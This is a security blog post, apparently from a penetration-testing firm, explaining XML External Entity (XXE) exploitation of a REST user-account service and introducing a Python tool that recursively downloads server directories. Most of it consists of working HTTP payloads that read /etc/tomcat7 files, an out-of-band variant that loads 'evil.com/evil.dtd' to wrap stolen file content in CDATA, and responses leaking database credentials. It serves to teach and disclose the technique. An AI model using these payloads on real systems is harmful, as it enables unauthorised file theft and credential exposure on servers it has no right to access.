Wednesday, April 29, 2015 At 1:40PM
During a recent penetration test GDS assessed an interesting RESTful web service that lead to the development of a tool for automating the process of exploiting an XXE (XML External Entity) processing vulnerability to exfiltrate data from the compromised system’s file system. In this post we will have a look at a sample web service that creates user accounts in order to demonstrate the usefulness of the tool.
The example request below shows four parameters in the body of the HTTP request:
PUT /api/user HTTP/1.1 Host: example.com Content-Type: application/xml Content-Length: 109 <?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?> <firstname>John</firstname> <surname>Doe</surname> <email>[email protected]</email> <role>admin</role>
The associated HTTP response contains the id of the created account in addition to the parameters supplied in the request:
HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 10:57:28 GMT Content-Type: application/xml Content-Length: 557 Connection: keep-alive { “userId”: 123, “firstname”: “John”, “surname”: “Doe”, “email”: “[email protected]”, “role”: “admin” }
Note that the web service accepts JSON and XML input, which explains why the response is JSON encoded. Supporting multiple data formats is becoming more common and has been detailed by a recent blog post by Antti Rantasaari.
A typical proof of concept for XXE is to retrieve the content of /etc/passwd, but with some XML parsers it is also possible to get directory listings. The following request defines the external entity “xxe” to contain the directory listing for “/etc/tomcat7/”:
PUT /api/user HTTP/1.1 Host: example.com Content-Type: application/xml Content-Length: 233 <?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?> <!DOCTYPE foo [ <!ENTITY xxe SYSTEM “file:///etc/tomcat7/”> ]> <user> <firstname>John</firstname> <surname>&xxe;</surname> <email>[email protected]</email> <role>admin</role> </user>
By referencing “&xxe;” in the surname element we should be able to see the directory listing in the response. Here it is:
HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 11:04:01 GMT Content-Type: application/xml Content-Length: 557 Connection: keep-alive { “userId”: 126, “firstname”: “John”, “surname”: “Catalina\ncatalina.properties\ncontext.xml\nlogging.properties\npolicy.d\nserver.xml\ntomcat-users.xml\nweb.xml\n”, “email”: “[email protected]”, “role”: “admin” }
The tool
Now that we can get directory listings and retrieve files the logical next step is to automate the process and download as many files as possible. The Python script linked below does exactly this. For example, we can mirror the directory “/etc/tomcat”:
# python xxeclient.py /etc/tomcat7/ 2015-04-24 16:21:10,650 [INFO ] retrieving /etc/tomcat7/ 2015-04-24 16:21:10,668 [INFO ] retrieving /etc/tomcat7/Catalina/ 2015-04-24 16:21:10,690 [INFO ] retrieving /etc/tomcat7/Catalina/localhost/ 2015-04-24 16:21:10,696 [INFO ] looks like a file: /etc/tomcat7/Catalina/localhost/ 2015-04-24 16:21:10,699 [INFO ] saving etc/tomcat7/Catalina/localhost 2015-04-24 16:21:10,700 [INFO ] retrieving /etc/tomcat7/catalina.properties/ 2015-04-24 16:21:10,711 [INFO ] looks like a file: /etc/tomcat7/catalina.properties/ 2015-04-24 16:21:10,714 [INFO ] saving etc/tomcat7/catalina.properties 2015-04-24 16:21:10,715 [INFO ] retrieving /etc/tomcat7/context.xml/ 2015-04-24 16:21:10,721 [INFO ] looks like a file: /etc/tomcat7/context.xml/ 2015-04-24 16:21:10,721 [INFO ] saving etc/tomcat7/context.xml […]
Now we can grep through the mirrored files to look for passwords and other interesting information. For example, the file “/etc/tomcat7/context.xml” may contain database credentials:
<?xml version=”1.0” encoding=”UTF-8”?> <Context> <Resource name=”jdbc/myDB” auth=”Container” type=”javax.sql.DataSource” username=”sqluser” password=”password” driverClassName=”com.mysql.jdbc.Driver” url=”jdbc:mysql://…”/> </Context>
How it works
The XXE payload used in the above request effectively copies the content of the file into the “<surname>” tag. As a result invalid XML (e.g. a file containing unmatched angle brackets) leads to parsing errors. Moreover the application might ignore unexpected XML tags.
To overcome these limitations the file content can be encapsulated in a CDATA section (an approach adopted from a presentation by Timothy D. Morgan). With the following request, five entities are declared. The file content is loaded into “%file”, “%start” starts a CDATA section and “%end” closes it. Finally, “%dtd” loads a specially crafted dtd file, which defines the entity “xxe” by concatenating “%start”, “%file” and “%end”. This entity is then referenced in the “<surname>” tag.
PUT /api/user HTTP/1.1 Host: example.com Content-Type: application/xml Content-Length: 378 <?xml version=”1.0” encoding=”UTF-8” standalone=”yes”?> <!DOCTYPE updateProfile [ <!ENTITY % file SYSTEM “file:///etc/tomcat7/context.xml”> <!ENTITY % start “<![CDATA[“> <!ENTITY % end “]]>”> <!ENTITY % dtd SYSTEM “http://evil.com/evil.dtd”> %dtd; ]> <user> <firstname>John</firstname> <surname>&xxe;</surname> <email>[email protected]</email> <role>admin</role> </user>
This is the resource “evil.dtd” that is loaded from web server we control:
<!ENTITY xxe “%start;%file;%end;”>
The response actually contains the content of the configuration file “/etc/tomcat7/context.xml”.
HTTP/1.1 200 OK Date: Tue, 03 Mar 2015 11:12:43 GMT Content-Type: application/xml Content-Length: 557 Connection: keep-alive { “userId”: 127, “firstname”: “John”, “surname”: “<?xml version=”1.0” encoding=”UTF-8”?>\n<Context>\n<Resource name=”jdbc/myDB” auth=”Container” type=”javax.sql.DataSource” username=”sqluser” password=”password” driverClassName=”com.mysql.jdbc.Driver” url=”jdbc:mysql://…”/>\n</Context>”, “email”: “[email protected]”, “role”: “admin” }
Caveats
Note that this technique only works if the server processing the XML input is allowed to make outbound connections to our server to fetch the file “evil.dtd”. Additionally, files containing ‘%’ (and in some cases ‘&’) signs or non-Unicode characters (e.g. bytes < 0x20) still result in a parsing error. Moreover, the sequence “]]>” causes problems because it terminates the CDATA section.
In the directory listing, there is no reliable way to distinguish between files and directories. The script assumes that files only contain alphanumerics, space and the following characters: “$.-_~”. Alternatively, we could also treat every file as a directory, iterate over its lines and try to download these possible files or subdirectories. However, this would result in too much overhead when encountering large files.
The script is tailored for the above example, but by changing the XML template and the “_parse_response()” method it should be fairly easy to adapt it for another target.
The script is available on GitHub.
Summary
One way to exploit XXE is to download files from the target server. Some parsers also return a directory listing. In this case we can use the presented script to recursively download whole directories. However, there are restrictions on the file content because certain characters can break the XML syntax.
Author: Georg Chalupar
©Aon plc 2023